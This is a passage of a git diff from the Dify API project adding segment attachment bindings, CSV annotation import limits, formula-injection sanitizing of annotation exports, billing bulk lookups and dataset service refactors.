mapped_column(sa.Boolean, nullable=False, default=True) created_at: Mapped[datetime] = mapped_column( @@ -1470,3 +1545,25 @@ class PipelineRecommendedPlugin(TypeBase): onupdate=func.current_timestamp(), init=False, ) + + +class SegmentAttachmentBinding(Base): + __tablename__ = "segment_attachment_bindings" + __table_args__ = ( + sa.PrimaryKeyConstraint("id", name="segment_attachment_binding_pkey"), + sa.Index( + "segment_attachment_binding_tenant_dataset_document_segment_idx", + "tenant_id", + "dataset_id", + "document_id", + "segment_id", + ), + sa.Index("segment_attachment_binding_attachment_idx", "attachment_id"), + ) + id: Mapped[str] = mapped_column(StringUUID, default=lambda: str(uuidv7())) + tenant_id: Mapped[str] = mapped_column(StringUUID, nullable=False) + dataset_id: Mapped[str] = mapped_column(StringUUID, nullable=False) + document_id: Mapped[str] = mapped_column(StringUUID, nullable=False) + segment_id: Mapped[str] = mapped_column(StringUUID, nullable=False) + attachment_id: Mapped[str] = mapped_column(StringUUID, nullable=False) + created_at: Mapped[datetime] = mapped_column(sa.DateTime, nullable=False, server_default=func.current_timestamp()) diff --git a/api/models/model.py b/api/models/model.py index 1731ff5699..88cb945b3f 100644 --- a/api/models/model.py +++ b/api/models/model.py @@ -111,7 +111,11 @@ class App(Base): else: app_model_config = self.app_model_config if app_model_config: - return app_model_config.pre_prompt + pre_prompt = app_model_config.pre_prompt or "" + # Truncate to 200 characters with ellipsis if using prompt as description + if len(pre_prompt) > 200: + return pre_prompt[:200] + "..." 
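The `attachments` property above signs preview URLs with HMAC-SHA256 over `image-preview|file_id|timestamp|nonce`. A hedged sketch of the matching verification; the serving endpoint's actual parameter handling and TTL are assumptions:

```python
import base64
import hashlib
import hmac
import time


def verify_image_preview_sign(
    secret_key: bytes, file_id: str, timestamp: str, nonce: str, sign: str, ttl: int = 300
) -> bool:
    """Recompute the signature, compare in constant time, then enforce freshness."""
    data_to_sign = f"image-preview|{file_id}|{timestamp}|{nonce}"
    digest = hmac.new(secret_key, data_to_sign.encode(), hashlib.sha256).digest()
    expected = base64.urlsafe_b64encode(digest).decode()
    if not hmac.compare_digest(expected, sign):
        return False
    return int(time.time()) - int(timestamp) <= ttl  # assumed expiry window
```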
+ return pre_prompt else: return "" @@ -259,7 +263,7 @@ class App(Base): provider_id = tool.get("provider_id", "") if provider_type == ToolProviderType.API: - if uuid.UUID(provider_id) not in existing_api_providers: + if provider_id not in existing_api_providers: deleted_tools.append( { "type": ToolProviderType.API, @@ -835,7 +839,29 @@ class Conversation(Base): @property def status_count(self): - messages = db.session.scalars(select(Message).where(Message.conversation_id == self.id)).all() + from models.workflow import WorkflowRun + + # Get all messages with workflow_run_id for this conversation + messages = db.session.scalars( + select(Message).where(Message.conversation_id == self.id, Message.workflow_run_id.isnot(None)) + ).all() + + if not messages: + return None + + # Batch load all workflow runs in a single query, filtered by this conversation's app_id + workflow_run_ids = [msg.workflow_run_id for msg in messages if msg.workflow_run_id] + workflow_runs = {} + + if workflow_run_ids: + workflow_runs_query = db.session.scalars( + select(WorkflowRun).where( + WorkflowRun.id.in_(workflow_run_ids), + WorkflowRun.app_id == self.app_id, # Filter by this conversation's app_id + ) + ).all() + workflow_runs = {run.id: run for run in workflow_runs_query} + status_counts = { WorkflowExecutionStatus.RUNNING: 0, WorkflowExecutionStatus.SUCCEEDED: 0, @@ -845,18 +871,24 @@ class Conversation(Base): } for message in messages: - if message.workflow_run: - status_counts[WorkflowExecutionStatus(message.workflow_run.status)] += 1 + # Guard against None to satisfy type checker and avoid invalid dict lookups + if message.workflow_run_id is None: + continue + workflow_run = workflow_runs.get(message.workflow_run_id) + if not workflow_run: + continue - return ( - { - "success": status_counts[WorkflowExecutionStatus.SUCCEEDED], - "failed": status_counts[WorkflowExecutionStatus.FAILED], - "partial_success": status_counts[WorkflowExecutionStatus.PARTIAL_SUCCEEDED], - } - if messages - else None - ) + try: + status_counts[WorkflowExecutionStatus(workflow_run.status)] += 1 + except (ValueError, KeyError): + # Handle invalid status values gracefully + pass + + return { + "success": status_counts[WorkflowExecutionStatus.SUCCEEDED], + "failed": status_counts[WorkflowExecutionStatus.FAILED], + "partial_success": status_counts[WorkflowExecutionStatus.PARTIAL_SUCCEEDED], + } @property def first_message(self): @@ -1255,13 +1287,9 @@ class Message(Base): "id": self.id, "app_id": self.app_id, "conversation_id": self.conversation_id, - "model_provider": self.model_provider, "model_id": self.model_id, "inputs": self.inputs, "query": self.query, - "message_tokens": self.message_tokens, - "answer_tokens": self.answer_tokens, - "provider_response_latency": self.provider_response_latency, "total_price": self.total_price, "message": self.message, "answer": self.answer, @@ -1283,12 +1311,8 @@ class Message(Base): id=data["id"], app_id=data["app_id"], conversation_id=data["conversation_id"], - model_provider=data.get("model_provider"), model_id=data["model_id"], inputs=data["inputs"], - message_tokens=data.get("message_tokens", 0), - answer_tokens=data.get("answer_tokens", 0), - provider_response_latency=data.get("provider_response_latency", 0.0), total_price=data["total_price"], query=data["query"], message=data["message"], diff --git a/api/models/workflow.py b/api/models/workflow.py index 42ee8a1f2b..853d5afefc 100644 --- a/api/models/workflow.py +++ b/api/models/workflow.py @@ -907,19 +907,29 @@ class 
WorkflowNodeExecutionModel(Base): # This model is expected to have `offlo @property def extras(self) -> dict[str, Any]: from core.tools.tool_manager import ToolManager + from core.trigger.trigger_manager import TriggerManager extras: dict[str, Any] = {} - if self.execution_metadata_dict: - if self.node_type == NodeType.TOOL and "tool_info" in self.execution_metadata_dict: - tool_info: dict[str, Any] = self.execution_metadata_dict["tool_info"] + execution_metadata = self.execution_metadata_dict + if execution_metadata: + if self.node_type == NodeType.TOOL and "tool_info" in execution_metadata: + tool_info: dict[str, Any] = execution_metadata["tool_info"] extras["icon"] = ToolManager.get_tool_icon( tenant_id=self.tenant_id, provider_type=tool_info["provider_type"], provider_id=tool_info["provider_id"], ) - elif self.node_type == NodeType.DATASOURCE and "datasource_info" in self.execution_metadata_dict: - datasource_info = self.execution_metadata_dict["datasource_info"] + elif self.node_type == NodeType.DATASOURCE and "datasource_info" in execution_metadata: + datasource_info = execution_metadata["datasource_info"] extras["icon"] = datasource_info.get("icon") + elif self.node_type == NodeType.TRIGGER_PLUGIN and "trigger_info" in execution_metadata: + trigger_info = execution_metadata["trigger_info"] or {} + provider_id = trigger_info.get("provider_id") + if provider_id: + extras["icon"] = TriggerManager.get_trigger_plugin_icon( + tenant_id=self.tenant_id, + provider_id=provider_id, + ) return extras def _get_offload_by_type(self, type_: ExecutionOffLoadType) -> Optional["WorkflowNodeExecutionOffload"]: diff --git a/api/pyproject.toml b/api/pyproject.toml index 2e7c96699f..9b2b3cd7ef 100644 --- a/api/pyproject.toml +++ b/api/pyproject.toml @@ -1,9 +1,10 @@ [project] name = "dify-api" -version = "1.10.1" +version = "1.11.1" requires-python = ">=3.11,<3.13" dependencies = [ + "aliyun-log-python-sdk~=0.9.37", "arize-phoenix-otel~=0.9.2", "azure-identity==1.16.1", "beautifulsoup4==4.12.2", @@ -31,6 +32,7 @@ dependencies = [ "httpx[socks]~=0.27.0", "jieba==0.42.1", "json-repair>=0.41.1", + "jsonschema>=4.25.1", "langfuse~=2.51.3", "langsmith~=0.1.77", "langdetect~=1.0.9", @@ -92,7 +94,6 @@ dependencies = [ "weaviate-client==4.17.0", "apscheduler>=3.11.0", "weave>=0.52.16", - "jsonschema>=4.25.1", ] # Before adding new dependency, consider place it in # alphabet order (a-z) and suitable group. 
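The `status_count` rewrite above replaces per-message `workflow_run` access with one `IN` query plus a dict lookup, eliminating the N+1 pattern. The same idea in isolation (the `WorkflowRun` import follows the surrounding code):

```python
from sqlalchemy import select


def load_runs_by_id(session, run_ids: list[str], app_id: str) -> dict:
    """Fetch all workflow runs in one query and index them by id."""
    if not run_ids:
        return {}
    rows = session.scalars(
        # WorkflowRun imported as in the hunk above
        select(WorkflowRun).where(WorkflowRun.id.in_(run_ids), WorkflowRun.app_id == app_id)
    ).all()
    return {row.id: row for row in rows}
```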
@@ -152,7 +153,7 @@ dev = [
     "types-pywin32~=310.0.0",
     "types-pyyaml~=6.0.12",
     "types-regex~=2024.11.6",
-    "types-shapely~=2.0.0",
+    "types-shapely~=2.1.0",
     "types-simplejson>=3.20.0",
     "types-six>=1.17.0",
     "types-tensorflow>=2.18.0",
@@ -217,6 +218,7 @@ vdb = [
     "pymochow==2.2.9",
     "pyobvector~=0.2.17",
     "qdrant-client==1.9.0",
+    "intersystems-irispython>=5.1.0",
     "tablestore==6.3.7",
     "tcvectordb~=1.6.4",
     "tidb-vector==0.0.9",
diff --git a/api/pytest.ini b/api/pytest.ini
index afb53b47cc..4a9470fa0c 100644
--- a/api/pytest.ini
+++ b/api/pytest.ini
@@ -1,5 +1,5 @@
 [pytest]
-addopts = --cov=./api --cov-report=json --cov-report=xml
+addopts = --cov=./api --cov-report=json
 env =
     ANTHROPIC_API_KEY = sk-ant-api11-IamNotARealKeyJustForMockTestKawaiiiiiiiiii-NotBaka-ASkksz
     AZURE_OPENAI_API_BASE = https://difyai-openai.openai.azure.com
diff --git a/api/services/annotation_service.py b/api/services/annotation_service.py
index 9258def907..d03cbddceb 100644
--- a/api/services/annotation_service.py
+++ b/api/services/annotation_service.py
@@ -1,10 +1,14 @@
+import logging
 import uuid
 
 import pandas as pd
 from sqlalchemy import or_, select
 from werkzeug.datastructures import FileStorage
 from werkzeug.exceptions import NotFound
 
+from core.helper.csv_sanitizer import CSVSanitizer
 from extensions.ext_database import db
 from extensions.ext_redis import redis_client
 from libs.datetime_utils import naive_utc_now
+
+logger = logging.getLogger(__name__)
@@ -155,6 +159,12 @@ class AppAnnotationService:
 
     @classmethod
     def export_annotation_list_by_app_id(cls, app_id: str):
+        """
+        Export all annotations for an app with CSV injection protection.
+
+        Sanitizes question and content fields to prevent formula injection attacks
+        when exported to CSV format.
+        """
         # get app info
         _, current_tenant_id = current_account_with_tenant()
         app = (
@@ -171,6 +181,16 @@ class AppAnnotationService:
             .order_by(MessageAnnotation.created_at.desc())
             .all()
         )
+
+        # Sanitize CSV-injectable fields to prevent formula injection
+        for annotation in annotations:
+            # Sanitize question field if present
+            if annotation.question:
+                annotation.question = CSVSanitizer.sanitize_value(annotation.question)
+            # Sanitize content field (answer)
+            if annotation.content:
+                annotation.content = CSVSanitizer.sanitize_value(annotation.content)
+
         return annotations
 
     @classmethod
@@ -330,6 +350,18 @@ class AppAnnotationService:
 
     @classmethod
     def batch_import_app_annotations(cls, app_id, file: FileStorage):
+        """
+        Batch import annotations from a CSV file with enhanced security checks.
+ + Security features: + - File size validation + - Row count limits (min/max) + - Memory-efficient CSV parsing + - Subscription quota validation + - Concurrency tracking + """ + from configs import dify_config + # get app info current_user, current_tenant_id = current_account_with_tenant() app = ( @@ -341,16 +373,80 @@ class AppAnnotationService: if not app: raise NotFound("App not found") + job_id: str | None = None # Initialize to avoid unbound variable error try: - # Skip the first row - df = pd.read_csv(file.stream, dtype=str) - result = [] - for _, row in df.iterrows(): - content = {"question": row.iloc[0], "answer": row.iloc[1]} + # Quick row count check before full parsing (memory efficient) + # Read only first chunk to estimate row count + file.stream.seek(0) + first_chunk = file.stream.read(8192) # Read first 8KB + file.stream.seek(0) + + # Estimate row count from first chunk + newline_count = first_chunk.count(b"\n") + if newline_count == 0: + raise ValueError("The CSV file appears to be empty or invalid.") + + # Parse CSV with row limit to prevent memory exhaustion + # Use chunksize for memory-efficient processing + max_records = dify_config.ANNOTATION_IMPORT_MAX_RECORDS + min_records = dify_config.ANNOTATION_IMPORT_MIN_RECORDS + + # Read CSV in chunks to avoid loading entire file into memory + df = pd.read_csv( + file.stream, + dtype=str, + nrows=max_records + 1, # Read one extra to detect overflow + engine="python", + on_bad_lines="skip", # Skip malformed lines instead of crashing + ) + + # Validate column count + if len(df.columns) < 2: + raise ValueError("Invalid CSV format. The file must contain at least 2 columns (question and answer).") + + # Build result list with validation + result: list[dict] = [] + for idx, row in df.iterrows(): + # Stop if we exceed the limit + if len(result) >= max_records: + raise ValueError( + f"The CSV file contains too many records. Maximum {max_records} records allowed per import. " + f"Please split your file into smaller batches." + ) + + # Extract and validate question and answer + try: + question_raw = row.iloc[0] + answer_raw = row.iloc[1] + except (IndexError, KeyError): + continue # Skip malformed rows + + # Convert to string and strip whitespace + question = str(question_raw).strip() if question_raw is not None else "" + answer = str(answer_raw).strip() if answer_raw is not None else "" + + # Skip empty entries or NaN values + if not question or not answer or question.lower() == "nan" or answer.lower() == "nan": + continue + + # Validate length constraints (idx is pandas index, convert to int for display) + row_num = int(idx) + 2 if isinstance(idx, (int, float)) else len(result) + 2 + if len(question) > 2000: + raise ValueError(f"Question at row {row_num} is too long. Maximum 2000 characters allowed.") + if len(answer) > 10000: + raise ValueError(f"Answer at row {row_num} is too long. Maximum 10000 characters allowed.") + + content = {"question": question, "answer": answer} result.append(content) - if len(result) == 0: - raise ValueError("The CSV file is empty.") - # check annotation limit + + # Validate minimum records + if len(result) < min_records: + raise ValueError( + f"The CSV file must contain at least {min_records} valid annotation record(s). " + f"Found {len(result)} valid record(s)." 
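Each imported row passes through the same normalize-then-validate steps; distilled into a standalone helper (the limits mirror the patch, the helper itself is illustrative):

```python
def normalize_row(question_raw, answer_raw) -> tuple[str, str] | None:
    """Strip, drop empty/NaN rows, and enforce per-field length caps."""
    question = str(question_raw).strip() if question_raw is not None else ""
    answer = str(answer_raw).strip() if answer_raw is not None else ""
    if not question or not answer or question.lower() == "nan" or answer.lower() == "nan":
        return None  # caller skips this row
    if len(question) > 2000 or len(answer) > 10000:
        raise ValueError("question/answer exceeds the allowed length")
    return question, answer
```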
+ ) + + # Check annotation quota limit features = FeatureService.get_features(current_tenant_id) if features.billing.enabled: annotation_quota_limit = features.annotation_quota_limit @@ -359,12 +455,34 @@ class AppAnnotationService: # async job job_id = str(uuid.uuid4()) indexing_cache_key = f"app_annotation_batch_import_{str(job_id)}" - # send batch add segments task + + # Register job in active tasks list for concurrency tracking + current_time = int(naive_utc_now().timestamp() * 1000) + active_jobs_key = f"annotation_import_active:{current_tenant_id}" + redis_client.zadd(active_jobs_key, {job_id: current_time}) + redis_client.expire(active_jobs_key, 7200) # 2 hours TTL + + # Set job status redis_client.setnx(indexing_cache_key, "waiting") batch_import_annotations_task.delay(str(job_id), result, app_id, current_tenant_id, current_user.id) - except Exception as e: + + except ValueError as e: return {"error_msg": str(e)} - return {"job_id": job_id, "job_status": "waiting"} + except Exception as e: + # Clean up active job registration on error (only if job was created) + if job_id is not None: + try: + active_jobs_key = f"annotation_import_active:{current_tenant_id}" + redis_client.zrem(active_jobs_key, job_id) + except Exception: + # Silently ignore cleanup errors - the job will be auto-expired + logger.debug("Failed to clean up active job tracking during error handling") + + # Check if it's a CSV parsing error + error_str = str(e) + return {"error_msg": f"An error occurred while processing the file: {error_str}"} + + return {"job_id": job_id, "job_status": "waiting", "record_count": len(result)} @classmethod def get_annotation_hit_histories(cls, app_id: str, annotation_id: str, page, limit): diff --git a/api/services/attachment_service.py b/api/services/attachment_service.py new file mode 100644 index 0000000000..2bd5627d5e --- /dev/null +++ b/api/services/attachment_service.py @@ -0,0 +1,31 @@ +import base64 + +from sqlalchemy import Engine +from sqlalchemy.orm import sessionmaker +from werkzeug.exceptions import NotFound + +from extensions.ext_storage import storage +from models.model import UploadFile + +PREVIEW_WORDS_LIMIT = 3000 + + +class AttachmentService: + _session_maker: sessionmaker + + def __init__(self, session_factory: sessionmaker | Engine | None = None): + if isinstance(session_factory, Engine): + self._session_maker = sessionmaker(bind=session_factory) + elif isinstance(session_factory, sessionmaker): + self._session_maker = session_factory + else: + raise AssertionError("must be a sessionmaker or an Engine.") + + def get_file_base64(self, file_id: str) -> str: + upload_file = ( + self._session_maker(expire_on_commit=False).query(UploadFile).where(UploadFile.id == file_id).first() + ) + if not upload_file: + raise NotFound("File not found") + blob = storage.load_once(upload_file.key) + return base64.b64encode(blob).decode() diff --git a/api/services/billing_service.py b/api/services/billing_service.py index 54e1c9d285..3d7cb6cc8d 100644 --- a/api/services/billing_service.py +++ b/api/services/billing_service.py @@ -1,8 +1,12 @@ +import logging import os +from collections.abc import Sequence from typing import Literal import httpx +from pydantic import TypeAdapter from tenacity import retry, retry_if_exception_type, stop_before_delay, wait_fixed +from typing_extensions import TypedDict from werkzeug.exceptions import InternalServerError from enums.cloud_plan import CloudPlan @@ -11,6 +15,15 @@ from extensions.ext_redis import redis_client from libs.helper import 
RateLimiter
 from models import Account, TenantAccountJoin, TenantAccountRole
 
+logger = logging.getLogger(__name__)
+
+
+class SubscriptionPlan(TypedDict):
+    """Tenant subscription plan information."""
+
+    plan: str
+    expiration_date: int
+
 
 class BillingService:
     base_url = os.environ.get("BILLING_API_URL", "BILLING_API_URL")
@@ -239,3 +252,39 @@ class BillingService:
     def sync_partner_tenants_bindings(cls, account_id: str, partner_key: str, click_id: str):
         payload = {"account_id": account_id, "click_id": click_id}
         return cls._send_request("PUT", f"/partners/{partner_key}/tenants", json=payload)
+
+    @classmethod
+    def get_plan_bulk(cls, tenant_ids: Sequence[str]) -> dict[str, SubscriptionPlan]:
+        """
+        Bulk fetch billing subscription plans via the billing API.
+        Payload: {"tenant_ids": ["t1", "t2", ...]} (max 200 per request)
+        Returns:
+            Mapping of tenant_id -> {plan: str, expiration_date: int}
+        """
+        results: dict[str, SubscriptionPlan] = {}
+        subscription_adapter = TypeAdapter(SubscriptionPlan)
+
+        chunk_size = 200
+        for i in range(0, len(tenant_ids), chunk_size):
+            chunk = tenant_ids[i : i + chunk_size]
+            try:
+                resp = cls._send_request("POST", "/subscription/plan/batch", json={"tenant_ids": chunk})
+                data = resp.get("data", {})
+
+                for tenant_id, plan in data.items():
+                    subscription_plan = subscription_adapter.validate_python(plan)
+                    results[tenant_id] = subscription_plan
+            except Exception:
+                logger.exception("Failed to fetch billing info batch for tenants: %s", chunk)
+                continue
+
+        return results
+
+    @classmethod
+    def get_expired_subscription_cleanup_whitelist(cls) -> Sequence[str]:
+        resp = cls._send_request("GET", "/subscription/cleanup/whitelist")
+        data = resp.get("data", [])
+        tenant_whitelist = []
+        for item in data:
+            tenant_whitelist.append(item["tenant_id"])
+        return tenant_whitelist
diff --git a/api/services/conversation_service.py b/api/services/conversation_service.py
index 39d6c81621..5253199552 100644
--- a/api/services/conversation_service.py
+++ b/api/services/conversation_service.py
@@ -118,7 +118,7 @@ class ConversationService:
         app_model: App,
         conversation_id: str,
         user: Union[Account, EndUser] | None,
-        name: str,
+        name: str | None,
         auto_generate: bool,
     ):
         conversation = cls.get_conversation(app_model, conversation_id, user)
diff --git a/api/services/dataset_service.py b/api/services/dataset_service.py
index bb09311349..970192fde5 100644
--- a/api/services/dataset_service.py
+++ b/api/services/dataset_service.py
@@ -7,7 +7,7 @@ import time
 import uuid
 from collections import Counter
 from collections.abc import Sequence
-from typing import Any, Literal
+from typing import Any, Literal, cast
 import sqlalchemy as sa
 from redis.exceptions import LockNotOwnedError
@@ -19,9 +19,10 @@ from configs import dify_config
 from core.errors.error import LLMBadRequestError, ProviderTokenNotInitError
 from core.helper.name_generator import generate_incremental_name
 from core.model_manager import ModelManager
-from core.model_runtime.entities.model_entities import ModelType
+from core.model_runtime.entities.model_entities import ModelFeature, ModelType
+from core.model_runtime.model_providers.__base.text_embedding_model import TextEmbeddingModel
 from core.rag.index_processor.constant.built_in_field import BuiltInField
-from core.rag.index_processor.constant.index_type import IndexType
+from core.rag.index_processor.constant.index_type import IndexStructureType
 from core.rag.retrieval.retrieval_methods import RetrievalMethod
 from enums.cloud_plan import CloudPlan
 from events.dataset_event
import dataset_was_deleted @@ -46,6 +47,7 @@ from models.dataset import ( DocumentSegment, ExternalKnowledgeBindings, Pipeline, + SegmentAttachmentBinding, ) from models.model import UploadFile from models.provider_ids import ModelProviderID @@ -363,6 +365,27 @@ class DatasetService: except ProviderTokenNotInitError as ex: raise ValueError(ex.description) + @staticmethod + def check_is_multimodal_model(tenant_id: str, model_provider: str, model: str): + try: + model_manager = ModelManager() + model_instance = model_manager.get_model_instance( + tenant_id=tenant_id, + provider=model_provider, + model_type=ModelType.TEXT_EMBEDDING, + model=model, + ) + text_embedding_model = cast(TextEmbeddingModel, model_instance.model_type_instance) + model_schema = text_embedding_model.get_model_schema(model_instance.model, model_instance.credentials) + if not model_schema: + raise ValueError("Model schema not found") + if model_schema.features and ModelFeature.VISION in model_schema.features: + return True + else: + return False + except LLMBadRequestError: + raise ValueError("No Model available. Please configure a valid provider in the Settings -> Model Provider.") + @staticmethod def check_reranking_model_setting(tenant_id: str, reranking_model_provider: str, reranking_model: str): try: @@ -402,13 +425,13 @@ class DatasetService: if not dataset: raise ValueError("Dataset not found") # check if dataset name is exists - - if DatasetService._has_dataset_same_name( - tenant_id=dataset.tenant_id, - dataset_id=dataset_id, - name=data.get("name", dataset.name), - ): - raise ValueError("Dataset name already exists") + if data.get("name") and data.get("name") != dataset.name: + if DatasetService._has_dataset_same_name( + tenant_id=dataset.tenant_id, + dataset_id=dataset_id, + name=data.get("name", dataset.name), + ): + raise ValueError("Dataset name already exists") # Verify user has permission to update this dataset DatasetService.check_dataset_permission(dataset, user) @@ -650,6 +673,8 @@ class DatasetService: Returns: str: Action to perform ('add', 'remove', 'update', or None) """ + if "indexing_technique" not in data: + return None if dataset.indexing_technique != data["indexing_technique"]: if data["indexing_technique"] == "economy": # Remove embedding model configuration for economy mode @@ -844,6 +869,12 @@ class DatasetService: model_type=ModelType.TEXT_EMBEDDING, model=knowledge_configuration.embedding_model or "", ) + is_multimodal = DatasetService.check_is_multimodal_model( + current_user.current_tenant_id, + knowledge_configuration.embedding_model_provider, + knowledge_configuration.embedding_model, + ) + dataset.is_multimodal = is_multimodal dataset.embedding_model = embedding_model.model dataset.embedding_model_provider = embedding_model.provider dataset_collection_binding = DatasetCollectionBindingService.get_dataset_collection_binding( @@ -880,6 +911,12 @@ class DatasetService: dataset_collection_binding = DatasetCollectionBindingService.get_dataset_collection_binding( embedding_model.provider, embedding_model.model ) + is_multimodal = DatasetService.check_is_multimodal_model( + current_user.current_tenant_id, + knowledge_configuration.embedding_model_provider, + knowledge_configuration.embedding_model, + ) + dataset.is_multimodal = is_multimodal dataset.collection_binding_id = dataset_collection_binding.id dataset.indexing_technique = knowledge_configuration.indexing_technique except LLMBadRequestError: @@ -937,6 +974,12 @@ class DatasetService: ) ) dataset.collection_binding_id = 
dataset_collection_binding.id + is_multimodal = DatasetService.check_is_multimodal_model( + current_user.current_tenant_id, + knowledge_configuration.embedding_model_provider, + knowledge_configuration.embedding_model, + ) + dataset.is_multimodal = is_multimodal except LLMBadRequestError: raise ValueError( "No Embedding Model available. Please configure a valid provider " @@ -1376,7 +1419,7 @@ class DocumentService: document.name = name db.session.add(document) - if document.data_source_info_dict: + if document.data_source_info_dict and "upload_file_id" in document.data_source_info_dict: db.session.query(UploadFile).where( UploadFile.id == document.data_source_info_dict["upload_file_id"] ).update({UploadFile.name: name}) @@ -1593,6 +1636,20 @@ class DocumentService: return [], "" db.session.add(dataset_process_rule) db.session.flush() + else: + # Fallback when no process_rule provided in knowledge_config: + # 1) reuse dataset.latest_process_rule if present + # 2) otherwise create an automatic rule + dataset_process_rule = getattr(dataset, "latest_process_rule", None) + if not dataset_process_rule: + dataset_process_rule = DatasetProcessRule( + dataset_id=dataset.id, + mode="automatic", + rules=json.dumps(DatasetProcessRule.AUTOMATIC_RULES), + created_by=account.id, + ) + db.session.add(dataset_process_rule) + db.session.flush() lock_name = f"add_document_lock_dataset_id_{dataset.id}" try: with redis_client.lock(lock_name, timeout=600): @@ -1604,65 +1661,67 @@ class DocumentService: if not knowledge_config.data_source.info_list.file_info_list: raise ValueError("File source info is required") upload_file_list = knowledge_config.data_source.info_list.file_info_list.file_ids - for file_id in upload_file_list: - file = ( - db.session.query(UploadFile) - .where(UploadFile.tenant_id == dataset.tenant_id, UploadFile.id == file_id) - .first() + files = ( + db.session.query(UploadFile) + .where( + UploadFile.tenant_id == dataset.tenant_id, + UploadFile.id.in_(upload_file_list), ) + .all() + ) + if len(files) != len(set(upload_file_list)): + raise FileNotExistsError("One or more files not found.") - # raise error if file not found - if not file: - raise FileNotExistsError() - - file_name = file.name + file_names = [file.name for file in files] + db_documents = ( + db.session.query(Document) + .where( + Document.dataset_id == dataset.id, + Document.tenant_id == current_user.current_tenant_id, + Document.data_source_type == "upload_file", + Document.enabled == True, + Document.name.in_(file_names), + ) + .all() + ) + documents_map = {document.name: document for document in db_documents} + for file in files: data_source_info: dict[str, str | bool] = { - "upload_file_id": file_id, + "upload_file_id": file.id, } - # check duplicate - if knowledge_config.duplicate: - document = ( - db.session.query(Document) - .filter_by( - dataset_id=dataset.id, - tenant_id=current_user.current_tenant_id, - data_source_type="upload_file", - enabled=True, - name=file_name, - ) - .first() + document = documents_map.get(file.name) + if knowledge_config.duplicate and document: + document.dataset_process_rule_id = dataset_process_rule.id + document.updated_at = naive_utc_now() + document.created_from = created_from + document.doc_form = knowledge_config.doc_form + document.doc_language = knowledge_config.doc_language + document.data_source_info = json.dumps(data_source_info) + document.batch = batch + document.indexing_status = "waiting" + db.session.add(document) + documents.append(document) + 
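The count comparison above (`len(files) != len(set(upload_file_list))`) detects that something is missing but not what; computing the difference of ID sets reports the offending files directly. A small sketch:

```python
def find_missing_ids(requested_ids: list[str], found_rows) -> set[str]:
    """Return upload-file IDs that the single IN query did not resolve."""
    return set(requested_ids) - {row.id for row in found_rows}


# e.g. raise FileNotExistsError(f"Files not found: {sorted(find_missing_ids(ids, files))}")
```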
duplicate_document_ids.append(document.id) + continue + else: + document = DocumentService.build_document( + dataset, + dataset_process_rule.id, + knowledge_config.data_source.info_list.data_source_type, + knowledge_config.doc_form, + knowledge_config.doc_language, + data_source_info, + created_from, + position, + account, + file.name, + batch, ) - if document: - document.dataset_process_rule_id = dataset_process_rule.id - document.updated_at = naive_utc_now() - document.created_from = created_from - document.doc_form = knowledge_config.doc_form - document.doc_language = knowledge_config.doc_language - document.data_source_info = json.dumps(data_source_info) - document.batch = batch - document.indexing_status = "waiting" - db.session.add(document) - documents.append(document) - duplicate_document_ids.append(document.id) - continue - document = DocumentService.build_document( - dataset, - dataset_process_rule.id, - knowledge_config.data_source.info_list.data_source_type, - knowledge_config.doc_form, - knowledge_config.doc_language, - data_source_info, - created_from, - position, - account, - file_name, - batch, - ) - db.session.add(document) - db.session.flush() - document_ids.append(document.id) - documents.append(document) - position += 1 + db.session.add(document) + db.session.flush() + document_ids.append(document.id) + documents.append(document) + position += 1 elif knowledge_config.data_source.info_list.data_source_type == "notion_import": notion_info_list = knowledge_config.data_source.info_list.notion_info_list # type: ignore if not notion_info_list: @@ -2305,6 +2364,7 @@ class DocumentService: embedding_model_provider=knowledge_config.embedding_model_provider, collection_binding_id=dataset_collection_binding_id, retrieval_model=retrieval_model.model_dump() if retrieval_model else None, + is_multimodal=knowledge_config.is_multimodal, ) db.session.add(dataset) @@ -2685,6 +2745,13 @@ class SegmentService: if "content" not in args or not args["content"] or not args["content"].strip(): raise ValueError("Content is empty") + if args.get("attachment_ids"): + if not isinstance(args["attachment_ids"], list): + raise ValueError("Attachment IDs is invalid") + single_chunk_attachment_limit = dify_config.SINGLE_CHUNK_ATTACHMENT_LIMIT + if len(args["attachment_ids"]) > single_chunk_attachment_limit: + raise ValueError(f"Exceeded maximum attachment limit of {single_chunk_attachment_limit}") + @classmethod def create_segment(cls, args: dict, document: Document, dataset: Dataset): assert isinstance(current_user, Account) @@ -2731,27 +2798,39 @@ class SegmentService: segment_document.word_count += len(args["answer"]) segment_document.answer = args["answer"] - db.session.add(segment_document) - # update document word count - assert document.word_count is not None - document.word_count += segment_document.word_count - db.session.add(document) + db.session.add(segment_document) + # update document word count + assert document.word_count is not None + document.word_count += segment_document.word_count + db.session.add(document) + db.session.commit() + + if args["attachment_ids"]: + for attachment_id in args["attachment_ids"]: + binding = SegmentAttachmentBinding( + tenant_id=current_user.current_tenant_id, + dataset_id=document.dataset_id, + document_id=document.id, + segment_id=segment_document.id, + attachment_id=attachment_id, + ) + db.session.add(binding) db.session.commit() - # save vector index - try: - VectorService.create_segments_vector( - [args["keywords"]], [segment_document], dataset, 
document.doc_form - ) - except Exception as e: - logger.exception("create segment index failed") - segment_document.enabled = False - segment_document.disabled_at = naive_utc_now() - segment_document.status = "error" - segment_document.error = str(e) - db.session.commit() - segment = db.session.query(DocumentSegment).where(DocumentSegment.id == segment_document.id).first() - return segment + # save vector index + try: + keywords = args.get("keywords") + keywords_list = [keywords] if keywords is not None else None + VectorService.create_segments_vector(keywords_list, [segment_document], dataset, document.doc_form) + except Exception as e: + logger.exception("create segment index failed") + segment_document.enabled = False + segment_document.disabled_at = naive_utc_now() + segment_document.status = "error" + segment_document.error = str(e) + db.session.commit() + segment = db.session.query(DocumentSegment).where(DocumentSegment.id == segment_document.id).first() + return segment except LockNotOwnedError: pass @@ -2899,7 +2978,7 @@ class SegmentService: document.word_count = max(0, document.word_count + word_count_change) db.session.add(document) # update segment index task - if document.doc_form == IndexType.PARENT_CHILD_INDEX and args.regenerate_child_chunks: + if document.doc_form == IndexStructureType.PARENT_CHILD_INDEX and args.regenerate_child_chunks: # regenerate child chunks # get embedding model instance if dataset.indexing_technique == "high_quality": @@ -2926,12 +3005,11 @@ class SegmentService: .where(DatasetProcessRule.id == document.dataset_process_rule_id) .first() ) - if not processing_rule: - raise ValueError("No processing rule found.") - VectorService.generate_child_chunks( - segment, document, dataset, embedding_model_instance, processing_rule, True - ) - elif document.doc_form in (IndexType.PARAGRAPH_INDEX, IndexType.QA_INDEX): + if processing_rule: + VectorService.generate_child_chunks( + segment, document, dataset, embedding_model_instance, processing_rule, True + ) + elif document.doc_form in (IndexStructureType.PARAGRAPH_INDEX, IndexStructureType.QA_INDEX): if args.enabled or keyword_changed: # update 